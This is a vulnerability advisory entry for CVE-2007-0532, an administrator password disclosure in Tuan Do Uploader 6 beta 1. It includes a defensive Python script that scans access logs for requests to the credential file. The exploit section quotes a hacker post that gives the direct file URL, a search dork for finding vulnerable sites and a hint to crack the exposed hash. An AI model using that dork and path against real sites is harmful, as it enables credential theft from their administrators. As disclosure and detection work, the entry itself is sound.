Uploader 'userdata/user_1.txt' Password Information Disclosure Vulnerability

Vulnerability ID: 1191971
Vulnerability type: Unknown
Published: 2007-01-25
Updated: 2007-01-25
CVE ID: CVE-2007-0532
CNNVD-ID: CNNVD-200701-432
Platform: N/A
CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/86726
https://cxsecurity.com/issue/WLB-2007010102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-432
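|Vulnerability details
Tuan Do Uploader (also known as php-uploader) 6 beta 1 stores sensitive information under the web root without sufficient access restrictions, which allows remote attackers to obtain administrator password information via a direct request for userdata/user_1.txt.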
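
To check whether the file described above has already been requested on a server, the following added example (not part of the original advisory or of the Uploader project) scans web access logs for direct requests to it. It assumes Apache/nginx "combined" log format; matching any `user_<N>.txt` rather than only `user_1.txt` is a generalization, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The advisory names userdata/user_1.txt; matching any user_<N>.txt is an assumption.
TARGET_RE = re.compile(r'/userdata/user_\d+\.txt$', re.IGNORECASE)


def classify(line):
    """Return a finding dict for a request to the credential file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("target").split("?", 1)[0]  # drop any query string
    path = unquote(unquote(path))               # undo single and double percent-encoding
    path = re.sub(r"/{2,}", "/", path)          # collapse duplicate slashes
    if not TARGET_RE.search(path):
        return None
    status = int(m.group("status"))
    # 2xx means the server returned the file; anything else is a failed probe.
    verdict = "DISCLOSED" if 200 <= status < 300 else "PROBE"
    return {"host": m.group("host"), "time": m.group("time"),
            "path": path, "status": status, "verdict": verdict}


def scan(lines):
    """Classify every log line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2007:10:00:00 +0000] "GET /upload/userdata/user_1.txt HTTP/1.1" 200 64 "-" "-"',
    '198.51.100.7 - - [25/Jan/2007:10:05:12 +0000] "GET /upload/userdata/user%5F1.txt?x=1 HTTP/1.1" 403 199 "-" "-"',
    '203.0.113.5 - - [25/Jan/2007:10:06:40 +0000] "GET /upload/index.php HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["verdict"], hit["status"], hit["host"], hit["path"])
```

A `DISCLOSED` finding means the server returned the file, so the administrator password should be treated as exposed and changed, and the `userdata` directory moved outside the web root or denied to direct requests.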
|Exploit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability

Script: Uploader

Version: 6 Beta 1

Dork: "Uploader Version 6 Beta 1"

Found By : BorN To K!LL

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Explo!T:.
^^^^^
www.site.com/[upload-path]/userdata/user_1.txt

as We see  Admin name & Hash .....
crack the password  .... :)

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GreeTz To :

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  Q8^RoCK  ,  SHiKaA  ,  str0ke  
,  ThE-LoRd-Of-CrAcKiNg

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

|Affected products
Tuan Do Uploader 6 Beta 1
|References

Source: XF
Name: uploader-userdata-info-disclosure(31683)
Link: http://xforce.iss.net/xforce/xfdb/31683
Source: BUGTRAQ
Name: 20070122 Uploader <= (userdata/user_1.txt) Password Disclosure Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/457698/100/0/threaded
Source: SREASON
Name: 2187
Link: http://securityreason.com/securityalert/2187